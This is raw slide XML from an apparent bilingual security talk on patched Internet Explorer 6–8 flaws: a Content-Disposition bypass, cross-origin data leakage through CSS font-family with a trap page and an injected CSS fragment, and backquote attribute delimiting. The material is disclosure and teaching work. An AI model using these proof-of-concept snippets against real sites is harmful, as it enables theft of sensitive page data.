              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>; filename=attach.html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Bypass Content-Disposition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Content-Disposition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>の回避</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t> 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Content-Disposition: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" u="sng" dirty="0" smtClean="0"/>
              <a:t>attachment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Download directive for browsers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ブラウザへのダウンロード指令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>often uses for preventing for XSS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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の対策にときどき使用される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41</a:t>
            </a:fld>
            <a:endParaRPr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86225"/>
            <a:ext cx="4895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Bypass Content-Disposition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Content-Disposition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>の回避</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t> 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r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Bypass "Content-Disposition: attachment" with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>specially crafted JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>by attacker.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>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻撃者の細工した</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>によりダウンロード指令をバイパス可能</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP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42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Bypass Content-Disposition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Content-Disposition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>の回避</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t> 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987674"/>
            <a:ext cx="8424936" cy="1631216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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // crafted JavaScript here. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // actual code is not open today :)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&lt;/script&gt;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&lt;iframe src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/download.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;/iframe&gt;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51788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itchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>trap page by attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>攻撃者による罠ページ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="003366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38610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itchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>http://example.com/download.cgi :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1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000" b="1" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>target content with "Content-Disposition: attachment" .</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1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2000" b="1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2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>Content-Disposition:attachment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>」のついた攻撃対象コンテンツ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003366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Bypass Content-Disposition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Content-Disposition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>の回避</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t> 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2852936"/>
            <a:ext cx="7787208" cy="1512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kumimoji="1" lang="en-US" altLang="ja-JP" sz="9600" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="9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Bypass Content-Disposition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Content-Disposition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>の回避</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t> 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r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Published: Jul 2007 in Japan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2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月に日本で公開</a:t>
            </a:r>
            <a:endParaRPr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Affected : IE6 / IE7 / IE8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>No way to prevent XSS by server-side</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>サーバ側での対策方法はない</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP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45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335699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407707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infomation leakage via CSS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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を通じた情報の漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="003366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24536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>leakage of sensitive data from HTML via CSS "font-family", "quotes"</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t> の </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>font-family</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t> や </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t> を通じて</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内の機密情報が漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="003366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8032" y="4005064"/>
            <a:ext cx="8532440" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EF6011"/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Fixed : MS10-071 at Oct 2010</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="36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infomation leakage via CSS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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を通じた情報の漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="003366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869792"/>
            <a:ext cx="8424936" cy="1631216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&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- injected by attacker --&gt;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&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}.a{font-family:a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- sensitive data here --&gt;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&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secret data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;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37890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trap page created by attacker</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" b="1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3657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target page containing sensitive data</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" b="1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4293096"/>
            <a:ext cx="8424936" cy="1938992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&lt;link rel="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" href="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/target.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text/css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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...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&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class="a"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id="target"&gt;&lt;/div&gt;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&lt;script&gt;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alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementById("target").currentStyle.fontFamily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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&lt;/script&gt;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263691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＼難解セキュリティ／</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="66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infomation leakage via CSS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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を通じた情報の漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="003366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869792"/>
            <a:ext cx="8424936" cy="1631216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&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- injected by attacker --&gt;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&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}.a{font-family:a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- sensitive data here --&gt;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&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secret data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;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37890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trap page created by attacker</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" b="1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3657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target page containing sensitive data</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" b="1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4293096"/>
            <a:ext cx="8424936" cy="1938992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&lt;style&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@import url("http://example.com/target.html"); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/style&gt;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...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&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class="a"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id="target"&gt;&lt;/div&gt;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&lt;script&gt;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    alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementById("target").currentStyle.fontFamily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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infomation leakage via CSS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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を通じた情報の漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="003366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2852936"/>
            <a:ext cx="7787208" cy="1512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kumimoji="1" lang="en-US" altLang="ja-JP" sz="9600" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="9600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="乗算記号 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="2271539"/>
            <a:ext cx="5184576" cy="2232248"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1064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infomation leakage via CSS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66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を通じた情報の漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="003366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Published: Nov 2008 in Japan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3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月に日本で公開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r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Republished: Sep 2010, SA41271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3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secunia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>よりアドバイザリ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r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Fixed: MS10-071 – Oct 2010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3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS10-071</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>にて</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修正</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Affected : IE6 / IE7 / IE8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407707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53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479715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54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JavaScript back-quotes issue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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>バッククォート問題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IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>treats the accent grave (`) as an attribute delimiter like " and '.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
